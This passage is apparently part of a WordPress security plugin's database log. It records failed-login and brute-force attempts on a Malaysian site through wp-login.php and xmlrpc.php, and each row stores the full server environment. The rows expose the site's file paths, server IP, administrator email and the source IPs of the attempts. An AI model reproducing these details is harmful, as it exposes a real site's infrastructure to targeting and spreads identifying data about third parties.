empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.165.20\";s:11:\"REMOTE_PORT\";s:5:\"39658\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNeWboUwst7QvA2tJFV@QAAAVY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566793305.8641\";s:12:\"REQUEST_TIME\";s:10:\"1566793305\";}}','notice','2019-08-26 04:21:47','2019-08-26 04:21:46',17684352,19176704,'https://bintara.com.my/wp-login.php',1,0,'164.132.165.20'),(23031,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.165.20\";s:11:\"REMOTE_PORT\";s:5:\"40464\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNeXElLQKVpx7Mms7u7JwAAAdE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566793308.8878\";s:12:\"REQUEST_TIME\";s:10:\"1566793308\";}}','notice','2019-08-26 04:21:50','2019-08-26 04:21:49',18199920,19498920,'https://bintara.com.my/xmlrpc.php',1,0,'164.132.165.20'),(23032,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.128.34.78\";s:11:\"REMOTE_PORT\";s:5:\"54133\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNhZboUwst7QvA2tJFYygAAAVM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566794086.0754\";s:12:\"REQUEST_TIME\";s:10:\"1566794086\";}}','notice','2019-08-26 04:34:47','2019-08-26 04:34:46',17684120,19174680,'https://bintara.com.my/wp-login.php',1,0,'178.128.34.78'),(23033,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"137.74.1.112\";s:11:\"REMOTE_PORT\";s:5:\"57870\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNiJroUwst7QvA2tJFZdgAAAVU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566794278.6422\";s:12:\"REQUEST_TIME\";s:10:\"1566794278\";}}','notice','2019-08-26 04:38:00','2019-08-26 04:37:59',17685088,19176064,'https://bintara.com.my/wp-login.php',1,0,'137.74.1.112'),(23034,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.211.109.201\";s:11:\"REMOTE_PORT\";s:5:\"32754\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNjbjzAXRCh@i15RK0twQAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566794606.7809\";s:12:\"REQUEST_TIME\";s:10:\"1566794606\";}}','notice','2019-08-26 04:43:28','2019-08-26 04:43:27',17683440,19174544,'https://bintara.com.my/wp-login.php',1,0,'162.211.109.201'),(23035,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.211.109.201\";s:11:\"REMOTE_PORT\";s:5:\"32973\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNjcroUwst7QvA2tJFaVgAAAVA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566794610.1696\";s:12:\"REQUEST_TIME\";s:10:\"1566794610\";}}','notice','2019-08-26 04:43:31','2019-08-26 04:43:30',18202912,19501616,'https://bintara.com.my/xmlrpc.php',1,0,'162.211.109.201'),(23036,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"82.223.12.109\";s:11:\"REMOTE_PORT\";s:5:\"48968\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNkKHxaD7qVX4VJuZ-IXwAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566794792.557\";s:12:\"REQUEST_TIME\";s:10:\"1566794792\";}}','notice','2019-08-26 04:46:33','2019-08-26 04:46:32',17684736,19175696,'https://bintara.com.my/wp-login.php',1,0,'82.223.12.109'),(23037,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.12.208\";s:11:\"REMOTE_PORT\";s:5:\"12510\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNks3xaD7qVX4VJuZ-IpwAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566794931.6637\";s:12:\"REQUEST_TIME\";s:10:\"1566794931\";}}','notice','2019-08-26 04:48:53','2019-08-26 04:48:52',17682800,19173992,'https://bintara.com.my/wp-login.php',1,0,'149.202.12.208'),(23038,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.12.208\";s:11:\"REMOTE_PORT\";s:5:\"13012\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNktnxaD7qVX4VJuZ-IqQAAAAk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566794934.7365\";s:12:\"REQUEST_TIME\";s:10:\"1566794934\";}}','notice','2019-08-26 04:48:56','2019-08-26 04:48:55',18199816,19496920,'https://bintara.com.my/xmlrpc.php',1,0,'149.202.12.208'),(23039,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 